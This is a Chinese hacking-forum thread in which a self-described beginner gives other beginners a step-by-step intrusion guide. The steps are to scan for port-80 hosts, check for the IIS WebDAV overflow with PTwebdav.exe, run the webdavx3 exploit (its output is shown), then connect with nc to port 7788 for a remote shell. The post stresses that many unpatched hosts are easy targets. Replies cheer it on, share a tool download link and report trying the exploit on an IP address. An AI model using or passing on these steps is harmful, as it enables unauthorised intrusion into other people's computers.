|
 | 作者: caller [caller]
 论坛用户 |
登录 |
| 自己是个菜鸟~~~~~~~~~~(我塞,谁丢我啊~~~~~~~~~ 对网络也只是知道一点,最近一直在研究黑客知识~~~~ 得到一点成果~~~为了让众多菜鸟中的菜鸟中的菜鸟........不至于黑里摸瞎,有心开始学,但是却被一些小问题搞的很累。最好先有点成果,下面也就有信心了。于是写一点自己的经验~~~~~一般的菜鸟就不要看了(呵呵) 1入侵之前先学一点基本的网络知识,比如:什么是端口,什么是telent,基本的nt命令要知道,cmd是什么(不要丢我啊~~~~我刚开始的时候就茫然了好久,其实在 开始》运行 里输入cmd就知道了~~~~:)这一些知识是很重要的。要不然什么都谈不上。 2告诉大家一个黑主机的方法 1)用webdav溢出,呵呵不要一看什么溢出就走。接者看啊~~~~菜菜的。 需要工具PTwebdav.exe(查看主机是否有该漏洞);webdav3.exe(攻击该漏洞);SuperScan(用于检查网段内开80端口的主机) 一切就绪先用SuperScan找。以后用PTwebdav.exe检查,如果显示:“The remote server is VULNERABLE”就可以黑了。假设其ip是192.168.1.1.1 接着打开你的cmd 输入命令:///(放webdav3的路径)webdav3 192.168.1.1.1 ........... 下面是webdav3的帮助 IIS WebDAV远程溢出程序使用方法: /////////////////////////////////////////////////////////// by isno@xfocus.org http://www.xfocus.net \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ C:\>webdavx3 192.168.0.1 IIS WebDAV overflow remote exploit by isno@xfocus.org start to try offset, if STOP a long time, you can press ^C and telnet 192.168.0.1 7788 try offset: 0 try offset: 1 try offset: 2 try offset: 3 try offset: 4 try offset: 5 try offset: 6 try offset: 7 try offset: 8 try offset: 9 try offset: 10 try offset: 11 try offset: 12 try offset: 13 try offset: 14 try offset: 15 try offset: 16 try offset: 17 try offset: 18 try offset: 19 try offset: -1 try offset: -2 try offset: -3 waiting for iis restart....................... (IIS在这里重起了,等一会) try offset: -4 (程序运行到这里停顿下来了,如果停顿时间比较长都没有反应,就按Ctrl+C,然后连上目标的7788端口去) ^C C:\>nc -vv 192.168.0.1 7788 192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [192.168.0.1] 7788 (?) open Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. 如果一切顺利就可以得到一个很好的shell了 以上的软件可可以在www.goolge.com 里搜索的到 以我的经验来看对方主机只要1是win2000中文系统2开了80端口。就可以成功webdav漏洞才发现没多久,很多主机还来不急打补丁的,局域网尤其如此。 就写这一些了,不足可笑之出,希望大家指正。本人很菜,希望和大家在这里交流,不断提高谢谢~ |
| 地主 发表时间: 05/26 09:28 |
 | 回复: drckness [drckness]  论坛用户 |
登录 |
|
虽然很菜很菜============可是!== 依然给点鼓励!!:} httP://drckness.jahee.com |
| B1层 发表时间: 05/26 18:48 |
 | 回复: simon7817 [simon7817]  论坛用户 |
登录 |
|
虽然很菜很菜============可是!==我比你更菜===== 一定要给鼓励!!:} httP://drckness.jahee.com 呵呵。。借人家的话来用了。。呵呵。。 |
| B2层 发表时间: 05/26 19:03 |
| 回复: simon7817 [simon7817] 论坛用户 |
登录 |
|
虽然很菜很菜============可是!==我比你更菜===== 一定要给鼓励!!:} httP://drckness.jahee.com 呵呵。。借人家的话来用了。。呵呵。。 |
| B3层 发表时间: 05/26 19:03 |
| 回复: simon7817 [simon7817] 论坛用户 |
登录 |
|
虽然很菜很菜============可是!==我比你更菜===== 一定要给鼓励!!:} httP://drckness.jahee.com 呵呵。。借人家的话来用了。。呵呵。。 |
| B4层 发表时间: 05/26 19:04 |
| 回复: simon7817 [simon7817] 论坛用户 |
登录 |
|
晕!偶可不是有心的。。怎么就发了那么多了。。呵呵 。。菜呀。。。对了。。楼上的那位不怪我学他的话了吧?我也帮他做广告了哦。。。 |
| B5层 发表时间: 05/26 19:07 |
| 回复: destiny [destiny] 论坛用户 |
登录 |
|
我很菜很菜,一定要给你鼓励的! |
| B6层 发表时间: 05/27 08:47 |
| 回复: simon7817 [simon7817] 论坛用户 |
登录 |
|
我想试一试呀。。不过PTwebdav.exe这个工具已经找不到了。。我在www.google.com和百度查过了。。是搜索到,但都能进去的,或者没有下载了。。有别的工具代替吗?或者,谁知道哪里有得下载?谢了 |
| B7层 发表时间: 05/27 11:05 |
| 回复: simon7817 [simon7817] 论坛用户 |
登录 |
|
寻寻觅觅我终于找到了。。。http://lib.yctc.edu.cn/soft/list.asp?id=4158 PTwebdav.exe |
| B8层 发表时间: 05/27 11:20 |
| 回复: simon7817 [simon7817] 论坛用户 |
登录 |
|
怎么我照着做了, Checking 192.168.103.137:80 ... The remote server is VULNERABLE See: http://www.microsoft.com/technet/security/bulletin/ms03-007.asp 却有这个结果? C:\>webdavx3 192.168.103.137 This application has been generated with an evaluation license of the PerlApp utility. The evaluation license has expired now. Please contact the author of this application for a non-expiring version of the program: yan xue <isno@hacker.com.cn>. 我的英语不大好啊?这段话是什么意思?怎么不是出现预料的呢? |
| B9层 发表时间: 05/27 12:02 |
 | 回复: crow [crow] 论坛用户 |
登录 |
|
我也是一样的 |
| B10层 发表时间: 05/27 14:13 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 菜鸟入侵(最近的一点心得~~~)高手末入